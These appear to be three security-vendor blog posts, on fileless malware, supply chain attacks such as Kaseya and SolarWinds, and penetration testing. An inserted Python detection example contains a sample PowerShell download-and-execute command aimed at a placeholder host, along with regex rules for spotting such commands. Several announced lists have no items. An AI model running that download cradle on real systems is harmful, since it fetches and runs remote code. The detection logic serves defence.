Every ransomware update you’ll hear right now includes discussion of a growing threat that goes by multiple names. Fileless malware. Living-off-the-land attacks. Memory-based attacks. Non-malware attacks.
Whatever you call it, the fileless malware threat is growing and extremely evasive—but you can mount a meaningful defense. In this blog, we talk with Pratum Senior Penetration Tester Jason Moulder about the growing issue of fileless malware attacks, how they work and how you can create an effective defense against this slippery enemy.
Fileless malware attacks give almost no sign of entry and leave almost no evidence in their wake. If a data breach were a physical burglary, a fileless malware attack would look something like arriving at your office to find the company’s secret formula missing from the vault. Yet there’s no sign of a broken lock, overturned furniture or even a footprint in the carpet. The bad guys seem to have materialized in the vault and evaporated with the goods just as mysteriously. The reality, however, is that they somehow convinced one of your trusted employees to steal the formula using their approved access to the vault.
In the same way, fileless malware attacks without introducing a foreign file into your system. It sneaks into legitimate operating system processes (especially Windows PowerShell) and works against you. That makes it extremely hard to detect through traditional antivirus software, which works by looking for known file signatures.
This hacking technique has been surging lately, as fileless malware attacks jumped 900% in 2020, according to one report. One study found that 74% of malware attacks in Q1 2021 were zero-day attacks, which includes any attack that doesn’t show up in the databases of signature-scanning tools.
Because these attacks leverage scripts within your legitimate software, they’re a bit like a digital cancer, with hackers turning the system’s own elements against it. With no file installation to detect, antivirus programs usually can’t see them. And because the fileless malware exploits trusted applications or the operating system itself, blocklisting the apps you consider dangerous won’t do any good. The most common vectors in fileless attacks are scripts that exploit Windows PowerShell, accounting for up to 90% of fileless attacks in some studies. Hackers also frequently leverage Windows Remote Management (WinRM) in fileless attacks.
Pratum Senior Penetration Tester Jason Moulder, who spends his days getting inside hackers’ minds, calls fileless malware one of the most elusive threats in play. “If you were to scan all the communication between all the APIs in your system every day, you’re looking at an incredible amount of data. If you look at your Task Manager, you’ll see certain elements running 50 times simultaneously because they’re used by multiple programs. That’s what makes fileless malware such a great attack avenue. The malicious activity gets lost inside the normal activities that make your operating system function.”
Digital forensics investigations struggle to analyze how attacks happened because the malicious script runs in memory and disappears after the system restarts.
Hackers also like this form of attack because it gives them admin access to an endpoint, letting them exploit it as a gateway to the rest of the network.
The security community has identified scores of binaries, scripts and libraries that hackers use in fileless attacks. (You can browse a list here.) Here are some of the most common ways that hackers get a foot in the door for these attacks:
PDFs – The issue with this ubiquitous file type typically revolves around opening PDFs in the web browser by default, which triggers one of the scripts hackers seek to exploit by blending their code into legitimate processes. “For example,” Jason says, “you can write something for PowerShell that says, ‘When you open this, open this command in the background and go get this file from the Internet.’ Whenever it goes to this website, that site can load something into memory.”
Microsoft Office macros – Similarly, Office macros run scripts that give hackers a chance to piggyback with their own malicious scripts. In response, Office now automatically blocks most macros. But Jason warns, “You can still trick people into enabling the macro. It may require some limited user action to initiate it, especially if it’s a Word doc or a PDF. When they click it to open it, that part is written to disk and can be seen in forensics. But once it’s loaded into memory, that’s where it can get lost pretty quickly.”
Security leaders engage in a daily arms race with hackers as each side counters new moves by the other. While fileless malware presents a serious threat, you can actively defend against it with the following steps.
Implement managed XDR – A managed XDR service like Pratum’s provides complete monitoring across your entire system through SIEM, endpoint detection and response and 24/7 SOC analysts interpreting the alerts that come in. Managed XDR spots suspicious activity and correlates signals to form a picture of a developing threat, even when it’s caused by something other than a known malicious file.
Jason points to the following indicators that XDR can pick up as the sign of a brewing fileless malware attack:
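As an added illustration (not part of the original post and not Pratum’s XDR logic), here is the kind of correlation a detection pipeline runs over process-creation telemetry: it flags PowerShell launched by a document viewer or Office app, surfaces the script hidden behind -EncodedCommand, and only raises an event when more than one weak signal lines up. The sample records are constructed, and the rule names and thresholds are assumptions.

```python
import base64
import re

# Constructed sample process-creation records (Sysmon-style fields), not real telemetry.
# The -EncodedCommand payload is just 'Write-Host hi' in UTF-16LE base64, built here.
ENCODED = base64.b64encode("Write-Host hi".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/stage')\""},
    {"parent": r"C:\Program Files\Adobe\Acrobat Reader\AcroRd32.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand " + ENCODED},
]
# Document viewers and Office apps have no business launching a shell.
DOC_PARENT = re.compile(r"\\(WINWORD|EXCEL|POWERPNT|OUTLOOK|AcroRd32|Acrobat)\.exe$", re.I)
POWERSHELL = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
# Command-line traits of "fetch from the Internet and run in memory" chains.
CMDLINE_RULES = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("download_cradle", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I)),
    ("in_memory_exec", re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I)),
]

def analyze(event):
    """Return the indicator names matched by one process-creation event."""
    findings = []
    if POWERSHELL.search(event["image"]) and DOC_PARENT.search(event["parent"]):
        findings.append("document_app_spawned_powershell")
    text = event["cmdline"]
    m = ENCODED_ARG.search(text)
    if m:
        findings.append("encoded_command")
        # Surface the script hidden behind the encoding and scan it as well.
        decoded = base64.b64decode(m.group(1)).decode("utf-16le", errors="replace")
        findings.append("decoded:" + decoded)
        text += " " + decoded
    findings += [name for name, rx in CMDLINE_RULES if rx.search(text)]
    return findings

def triage(events, min_hits=2):
    """Keep events with at least min_hits indicators; a lone weak signal is admin noise."""
    hits = {i: analyze(e) for i, e in enumerate(events)}
    return {i: f for i, f in hits.items() if sum(not x.startswith("decoded:") for x in f) >= min_hits}
```

The first record (an admin script run from Explorer) produces no findings, which is the point: the same binary that makes fileless attacks hard to spot is also legitimate on every host, so the parent process and command-line traits carry the signal.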
Limit user access – Many fileless malware attacks target users with wide-ranging network access, using compromised credentials to pivot throughout the system. By limiting users to only the data they really need (as described here), you can limit hackers’ ability to move laterally if they get in.
Jason calls specific attention to admin accounts. “Using the default admin built into Windows is a very bad habit because once you have that account, you can go pretty much anywhere,” he says.
Train employees – This advice never goes out of style. Teaching employees to recognize and avoid suspicious links will greatly reduce your risk by preventing malicious scripts from ever getting the chance to scan a device and go to work.
For advice about how you can protect your specific system from the ever-changing fileless malware threat, contact Pratum today.
One of 2021’s biggest cybersecurity storylines has been the jump in supply chain attacks. (They’ve jumped fourfold this year in some reports.) These attacks turn the breach of a single organization into a massive headache for hundreds of partner companies. One of the most famous examples was the breach of Kaseya in July. That attack eventually enabled the REvil ransomware organization to encrypt the data of hundreds of companies worldwide as the attack cascaded outward from Kaseya to managed service providers (MSPs) to small/medium-size businesses. In a supply chain attack, the threat comes from one of your trusted software providers who hackers turn into a Trojan horse before anyone realizes what’s happening.
In this post, we’ll break down how supply chain attacks happen and what you can do to protect your system from these threats that arrive when your most trusted vendors unknowingly pass a big problem along to you.
In what you might think of as a traditional hack, threat actors target one company and conduct reconnaissance to find vulnerabilities they can exploit. Then the threat actor breaks into that specific victim's computer network to exfiltrate data, launch ransomware, etc.
During a supply chain attack, the threat actors take the same initial steps, but their focus is upstream. They will compromise and infiltrate a trusted vendor that supplies software or IT services to many other companies. In this kind of attack, the goal isn’t focused on data exfiltration or launching ransomware on the vendors’ systems. Rather, hackers intend to sneak malware into the “supply chain” of software updates that the company installs on its customers’ computers. From a hacker’s perspective, these attacks are more efficient and have a greater impact because they leverage IT vendors that already have established and authorized connections into their customers’ network and systems. That means the malware can deploy across hundreds of companies and systems virtually undetected.
Every client of the IT vendor under attack becomes part of the attack. This blows up the “security by obscurity” belief that many smaller companies adopt. They think that because they’re small, they won’t be targeted by threat actors. But with supply chain attacks, tiny companies face just as much risk as big, high-profile enterprises.
To understand these attacks, let’s break down the famous 2021 breach of Kaseya, an IT management software provider that mainly serves MSPs. On Friday, July 2, Kaseya’s incident response team identified a security incident related to Kaseya VSA. Their VSA (Virtual System Administrator) product delivers automated software patching, remote monitoring, and other capabilities so MSPs can seamlessly manage their customers' IT infrastructure. After breaking into Kaseya, the threat actors infected 50-60 MSPs. From there, they infected approximately 1,500 of the MSPs’ clients. The threat actors encrypted the victims’ data, effectively shutting down systems and networks. In Sweden, for example, the supermarket chain Coop closed 800 stores when its cash registers and payment processing systems went down—all because of a breach that was originally two steps removed from Coop’s systems.
The threat actors initially demanded $70 million to decrypt the systems, but later lowered the demand to $50 million. It appears that Kaseya refused to pay the ransom and received a decryptor tool from a third party on July 21 (yes, that’s nearly three weeks after the problem was discovered). With this tool, Kaseya was able to assist victims in restoring their systems and networks.
The SolarWinds breach that dominated headlines in December 2020 was another supply chain attack. Russian hackers, working for the Russian government, injected malicious code into SolarWinds’ IT management tool Orion, which gave the attackers access to thousands of systems when it was deployed. SolarWinds reported that up to 18,000 clients had installed the update with that malicious code. The victims of this attack included both private companies and government agencies, including NASA, the State Department, the Department of Defense, and the Department of Justice. The hackers didn’t demand a ransom, which indicates that this attack focused on espionage.
Supply chain attacks are hard to defend against because they use software updates from trusted vendors. Organizations have always been concerned about infections that come from employees opening phishing e-mails with malicious attachments; clicking links and revealing their login credentials; or plugging a virus-infected USB drive into their computer. Today though, companies must also focus on creating defenses that screen the IT software and service providers who have authorized access into their network.
Threat actors increasingly use supply chain attacks for several reasons:
To mitigate the risk of supply chain attacks, we recommend the following steps:
Pratum’s team can help you create a thorough defense strategy that protects your operations even when threats arrive from your trusted partners. Contact us for a free consultation.
Regular penetration testing provides a key pillar in your ongoing cybersecurity plans. But penetration tests come in a lot of forms, and vendors often put their own spin on describing their work. In simple terms, penetration testing involves a team of ethical hackers proactively looking for exploitable vulnerabilities in your web applications, computer systems and networks. Their job is to identify your security gaps before a hacker does and compromises your system.
To ensure you’re picking a pen test that meets your needs, use this blog to understand the purpose and value of internal penetration testing and external penetration testing. Attacks can come from any direction, so your testing has to probe for weaknesses that come from outside and inside your environment.
External pen testing examines anything with external access, including any device with a public-facing service, IP or URL such as a web application, firewall, server or IoT device. A pen tester may also try to gain access to external-facing assets such as e-mail, file shares, or websites. The pen testers simulate the work of an attacker who, depending on their motivation, may utilize a vulnerability or chain multiple vulnerabilities together in order to gain access to sensitive data. In various parts of the Internet, hackers sell or trade information on zero-day exploits (those not listed in known vulnerability databases) for these purposes.
External pen testing methods include:
During the process, a pen tester gathers information on open ports, vulnerabilities, and the company’s users. Then they attempt to leverage that information for various attacks such as brute forcing passwords, phishing attacks, and precise operating system and service attacks.
The external pen test should reveal any areas that may be compromised and exploited to gain access to your network. The organization should also use the pen test as an opportunity to verify their current process for detecting anomalous activity. In other words, did your defenses pick up what the pen tester was trying to do and stop them?
Once a perimeter is breached, a given pen test’s rules of engagement may allow for using further attacks to gain access to internal network assets, often referred to as pivoting or lateral movement.
Most organizations focus on the perimeter in their security work. But the fact is that those with direct access to an organization’s data pose the most significant threat overall. People (even well-intentioned ones) are often easily manipulated and prone to mistakes. Many times, what happens at the host level goes unmonitored, and many organizations aren’t aware of what is entering or leaving their networks. Many common misconfigurations lead to full network compromise. All of that makes internal pen testing a critical part of your security strategy, even if your external pen testing seemed secure.
If your business has a file sharing system without a password, for example, you should re-evaluate who has access to various levels of content. Not every employee needs access to the same data, and unnecessary access could leave you vulnerable to an attack, whether by an employee with malicious intent or a loyal employee who unknowingly gives their login credentials to a hacker.
The expansion of work-from-home policies has created a new range of internal vulnerabilities to test. Those may include private networks such as home Wi-Fi, smartphones, and cable and streaming services. Connecting your organization’s network to any of those channels could open it up to external threats.
A threat actor who manages to get in through one of these channels rarely attacks right away. They may move about and gather private data by observing from within. During this quiet period, they may collect data to use later or sell to others. Hackers could lurk in your system for weeks, months or longer if proper internal auditing, patching and testing are not performed on a regular basis. An IBM study shows that, on average, American companies take 186 days to detect a data breach and another 51 days to fully contain it. A breach of Starwood Hotels discovered in 2018 had gone undetected for four years.
During internal pen testing, the assessor tries to find out just how much damage a threat actor or employee could do from inside the network. A poorly secured domain could lead to total control of a network, but most tests require multiple attack paths to complete the objective. Hackers often pull this off by exploiting relaxed policies that focus on convenience rather than necessary mitigations.
The tester will often use less important, easier-to-compromise systems as a channel for getting to more secure areas with higher levels of protection and more sensitive data and controls. Internal pen testing can also include privilege escalation, malware spreading, information leakage and other malicious activities.
Internal pen testing methods include:
Choosing the right security path for your business is not always simple, and there is no “standard” penetration test that works for every organization. No matter how large or small your organization, Pratum can customize a solution that provides value to your organization.
If you’re interested in learning more about the type of pen test that will work best for you, contact Pratum today.